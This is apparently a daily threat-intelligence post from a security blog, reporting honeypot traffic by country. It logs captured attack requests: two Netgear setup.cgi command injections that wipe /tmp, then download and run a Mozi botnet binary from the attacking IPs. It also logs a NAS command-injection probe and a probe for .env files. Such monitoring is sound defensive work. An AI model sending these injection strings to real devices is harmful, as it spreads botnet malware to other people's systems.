Skip to main content
Shoggoth Industries - Security Blog
  1. Daily-Posts/

Report: 2025-07-26

·272 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-07-26
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 2 new requests that have never been observed before (these were added to the monitored request database.).

A total of 649 requests were recorded during the day, originating from 2 different countries, with a peak of 432 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
KRGermany
JPGermany
USDubai
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
103.182.134.88GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.182.134.88:44902/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
103.158.171.53GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.158.171.53:60763/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
932GET /.env-config.js HTTP/1.1
1691GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwltZW93 HTTP/1.0

country_iso_code
#

number_of_occurencecountry_iso_code
0432US
180GB
217BG
316PL
415DE
512NL
612SC
78RU
88ZA
96RO
105CN
114CA
124SG
133JP
143MU
153LT
163UA
173FR
182KZ
192KR
202IN
211ES
221EE
231PT
241AE
251SE
261GR
271ID
281CZ
291MC

Related

Report: 2025-07-25
·361 words
Repport Daily
Report: 2025-07-24
·340 words
Repport Daily
Report: 2025-07-23
·292 words
Repport Daily